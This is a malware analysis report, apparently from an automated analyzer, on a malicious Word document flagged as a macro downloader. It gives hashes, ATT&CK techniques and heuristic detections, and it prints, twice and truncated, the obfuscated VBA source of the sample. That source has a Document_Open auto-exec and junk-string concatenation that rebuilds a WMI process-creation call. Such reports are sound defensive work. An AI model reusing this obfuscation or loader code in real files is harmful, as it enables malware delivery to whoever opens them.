Office (OLE) malware analysis — malicious · ccd9b3408b9ff3cc

MALICIOUS

Office (OLE)

200.8 KB Created: 2020-08-19 06:42:00 Authoring application: Microsoft Office Word First seen: 2020-09-07

MD5: 542e58f76cab6111ec59b8f33df0c8a3 SHA-1: 0be6b58fa4a7c4c544e15a33ac999209d9904d08 SHA-256: ccd9b3408b9ff3cc39de0b2dc3157e6781bb8938aa166b1673ef9df3016c30eb

262 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro and a hidden UserForm command stager, which are indicative of a downloader. The presence of the ClamAV detection 'Doc.Downloader.Generic-9389669-0' further supports this. The VBA code attempts to obfuscate its actions by using string concatenations and conditional logic, but the overall intent appears to be the execution of a secondary payload.

Heuristics 7

ClamAV: Doc.Downloader.Generic-9389669-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-9389669-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15410 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15410 bytes
SHA-256: `d826f9c1c2cfbf2575c8d89d0733054f4da9e3ea730e930654caaa68d006bec8`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Ozcfzttiyn1hn5nhh" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub _ Document_open() Ll53rsfrsrw1ncz8.Wjd61wsdocdl9_xcr End Sub Attribute VB_Name = "Ll53rsfrsrw1ncz8" Attribute VB_Base = "0{D6456B62-EA8A-429F-A64F-15D03B55C94D}{818EFAA9-1CAB-4356-8DBD-201A26247004}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function Wjd61wsdocdl9_xcr() Rlbnswhdjemx = "727" If Len("Wjjhm_jqwfz6i69fI4vvfkvkt9x8ng") = Len("X08_7_4m32cgntj2k9") + 1 Then End If Len("Utbbz0y84cwti_10kYkrtq56deh3jhn0uopXhahcakfi5hxu_3ly") < Len("Gcihw6qft7iuz") Then MsgBox "Hen39cotgywk9ui" + "Kblhemw1vf29r" MsgBox ("Xzewmpxaow028v") MsgBox "I988jqhirr0txg4" + "Lb429fmh4xpy1" End If If Len("Kqaeki6ai91qDo8_5wkszd6yfwzd") = Len("Btticsst8urp46a") Then MsgBox "Nh58xvcp21mgrew" + "Xx8h8pc7or8b" MsgBox ("C8j5fxp7h0qrdsngl !!!") MsgBox "U9lsg95wde9" + "Ezbwx4cmlrhk1yq" End If A3t259mb4jv540m = Ll53rsfrsrw1ncz8.HelpContextId + 50 + 50 Ibfxd14mt4i59 = "130" If Len("I72kchso4rmy0n6x3V4rfjulb3vvk69o") = Len("Pax24r49jzl") + 1 Then End If Len("Tps7awaekgxg0bX5sxoj935ab5naWuj6kmczki9j2pn") < Len("U3a7d3c8g5yz60") Then MsgBox "Qe1ld9d3e5eior_gm" + "Ojbmeresmyryo6" MsgBox ("Lkfbektya8b_t") MsgBox "Lhxlikz2l_jhvvpl" + "Lk99h6figbwbqc" End If If Len("P48r5nfuw10f49Yi1rwzw2jmrccjd1") = Len("X2w3z9rck1liiznlrd") Then MsgBox "I0r40cyfnkdls" + "Cjbl9kliom0ktaxe3w" MsgBox ("To8q0x1b4e4g !!!") MsgBox "Vieqmau5cdve5z" + "Qsisrf3wg4cyhis" End If Gvpkdsmih519 = ChrW(A3t259mb4jv540m + (15)) Glrmpz9tup13 = "689" If Len("Iln72_y0qtkYkcglxm1m1zs93") = Len("U37l1b_0udc0agj") + 1 Then End If Len("Uh8so7nj4nb4xx790Wguiuo0ltdiymuX9kbke9pxsm") < Len("Fm8he_uldju") Then MsgBox "Ntcmkafbs121v8zm" + "T81in3_w7dy3i_xnyt" MsgBox ("Bvfxnltrvhwilinmn") MsgBox "Kf3d2o9rjj2em9o9j" + "Qkm96kppj6mu7y" End If If Len("Njn__52z8bj1rS6o0_1csrksymfce1") = Len("C64ya9ku7vp7v") Then MsgBox "Yuua0v89hb4dsls" + "Q4m8xwbb5qyq5sc" MsgBox ("S914vbgfrfy369q !!!") MsgBox "Bk0xuz9msths8rez0i" + "Ov1_vwgpr0jg8a" End If Ghfsqr2e6g9v89il = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Gvpkdsmih519 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Ll53rsfrsrw1ncz8.Q8m407jioxebgiht + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf" Hcigpx2t_c1 = "173" If Len("Eb9q4lpglh8nxcqAo430o9an_dvxbinh") = Len("U8sagefg4df6") + 1 Then End If Len("Ih8tvk9w4e8c5h5H_ufqltn_iyx3v5Np3n2txdju_4v0m9l") < Len("New1dbyttnwl6hkb") Then MsgBox "Kqq33mq77l14b72" + "Cb1j4m1zh_kr0" MsgBox ("Utto9r6834f5h102") MsgBox "M7_2fv42c12u3b" + "Yguhky9jqhk9d_e_2r" End If If Len("Vv00w01x72dm_2gBg2r5twuu7yz391adj") = Len("K_h9jubctm6k") Then MsgBox "Ydd5a_zk0pp2" + "A69adj2s385ir" MsgBox ("Urdhzvr3y68_du0pu4 !!!") MsgBox "Ztgfsjwuzfhj" + "Nc956h1f5jhceef" End If G_9zdll22036bu9x = Ayhrnk04u221(Ghfsqr2e6g9v89il) Cto4_0_nexji4vyx = "785" If Len("Po4qnmylcp0dxiwwsW3a7ivxvziarbq") = Len("Vfc_h2h2r8takr") + 1 T ... (truncated)

SHA-256: d826f9c1c2cfbf2575c8d89d0733054f4da9e3ea730e930654caaa68d006bec8

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Ozcfzttiyn1hn5nhh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub _
Document_open()
Ll53rsfrsrw1ncz8.Wjd61wsdocdl9_xcr
End Sub


Attribute VB_Name = "Ll53rsfrsrw1ncz8"
Attribute VB_Base = "0{D6456B62-EA8A-429F-A64F-15D03B55C94D}{818EFAA9-1CAB-4356-8DBD-201A26247004}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Wjd61wsdocdl9_xcr()
   Rlbnswhdjemx = "727"
If Len("Wjjhm_jqwfz6i69fI4vvfkvkt9x8ng") = Len("X08_7_4m32cgntj2k9") + 1 Then End
If Len("Utbbz0y84cwti_10kYkrtq56deh3jhn0uopXhahcakfi5hxu_3ly") < Len("Gcihw6qft7iuz") Then
        MsgBox "Hen39cotgywk9ui" + "Kblhemw1vf29r"
        MsgBox ("Xzewmpxaow028v")
        MsgBox "I988jqhirr0txg4" + "Lb429fmh4xpy1"
End If
If Len("Kqaeki6ai91qDo8_5wkszd6yfwzd") = Len("Btticsst8urp46a") Then
       MsgBox "Nh58xvcp21mgrew" + "Xx8h8pc7or8b"
       MsgBox ("C8j5fxp7h0qrdsngl !!!")
       MsgBox "U9lsg95wde9" + "Ezbwx4cmlrhk1yq"
End If

A3t259mb4jv540m = Ll53rsfrsrw1ncz8.HelpContextId + 50 + 50
   Ibfxd14mt4i59 = "130"
If Len("I72kchso4rmy0n6x3V4rfjulb3vvk69o") = Len("Pax24r49jzl") + 1 Then End
If Len("Tps7awaekgxg0bX5sxoj935ab5naWuj6kmczki9j2pn") < Len("U3a7d3c8g5yz60") Then
        MsgBox "Qe1ld9d3e5eior_gm" + "Ojbmeresmyryo6"
        MsgBox ("Lkfbektya8b_t")
        MsgBox "Lhxlikz2l_jhvvpl" + "Lk99h6figbwbqc"
End If
If Len("P48r5nfuw10f49Yi1rwzw2jmrccjd1") = Len("X2w3z9rck1liiznlrd") Then
       MsgBox "I0r40cyfnkdls" + "Cjbl9kliom0ktaxe3w"
       MsgBox ("To8q0x1b4e4g !!!")
       MsgBox "Vieqmau5cdve5z" + "Qsisrf3wg4cyhis"
End If

Gvpkdsmih519 = ChrW(A3t259mb4jv540m + (15))
   Glrmpz9tup13 = "689"
If Len("Iln72_y0qtkYkcglxm1m1zs93") = Len("U37l1b_0udc0agj") + 1 Then End
If Len("Uh8so7nj4nb4xx790Wguiuo0ltdiymuX9kbke9pxsm") < Len("Fm8he_uldju") Then
        MsgBox "Ntcmkafbs121v8zm" + "T81in3_w7dy3i_xnyt"
        MsgBox ("Bvfxnltrvhwilinmn")
        MsgBox "Kf3d2o9rjj2em9o9j" + "Qkm96kppj6mu7y"
End If
If Len("Njn__52z8bj1rS6o0_1csrksymfce1") = Len("C64ya9ku7vp7v") Then
       MsgBox "Yuua0v89hb4dsls" + "Q4m8xwbb5qyq5sc"
       MsgBox ("S914vbgfrfy369q !!!")
       MsgBox "Bk0xuz9msths8rez0i" + "Ov1_vwgpr0jg8a"
End If

Ghfsqr2e6g9v89il = "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfi111ss[sns ]]d][ jsa nbsb22v2yfnm111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfgm111ss[sns ]]d][ jsa nbsb22v2yft111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf" + Gvpkdsmih519 + "111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf:111ss[sns ]]d][ jsa nbsb22v2yfw111ss[sns ]]d][ jsa nbsb22v2yfin111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yf3111ss[sns ]]d][ jsa nbsb22v2yf2111ss[sns ]]d][ jsa nbsb22v2yf_111ss[sns ]]d][ jsa nbsb22v2yf" + Ll53rsfrsrw1ncz8.Q8m407jioxebgiht + "111ss[sns ]]d][ jsa nbsb22v2yfro111ss[sns ]]d][ jsa nbsb22v2yf111ss[sns ]]d][ jsa nbsb22v2yfce111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yfs111ss[sns ]]d][ jsa nbsb22v2yf"
   Hcigpx2t_c1 = "173"
If Len("Eb9q4lpglh8nxcqAo430o9an_dvxbinh") = Len("U8sagefg4df6") + 1 Then End
If Len("Ih8tvk9w4e8c5h5H_ufqltn_iyx3v5Np3n2txdju_4v0m9l") < Len("New1dbyttnwl6hkb") Then
        MsgBox "Kqq33mq77l14b72" + "Cb1j4m1zh_kr0"
        MsgBox ("Utto9r6834f5h102")
        MsgBox "M7_2fv42c12u3b" + "Yguhky9jqhk9d_e_2r"
End If
If Len("Vv00w01x72dm_2gBg2r5twuu7yz391adj") = Len("K_h9jubctm6k") Then
       MsgBox "Ydd5a_zk0pp2" + "A69adj2s385ir"
       MsgBox ("Urdhzvr3y68_du0pu4 !!!")
       MsgBox "Ztgfsjwuzfhj" + "Nc956h1f5jhceef"
End If

G_9zdll22036bu9x = Ayhrnk04u221(Ghfsqr2e6g9v89il)
   Cto4_0_nexji4vyx = "785"
If Len("Po4qnmylcp0dxiwwsW3a7ivxvziarbq") = Len("Vfc_h2h2r8takr") + 1 T
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.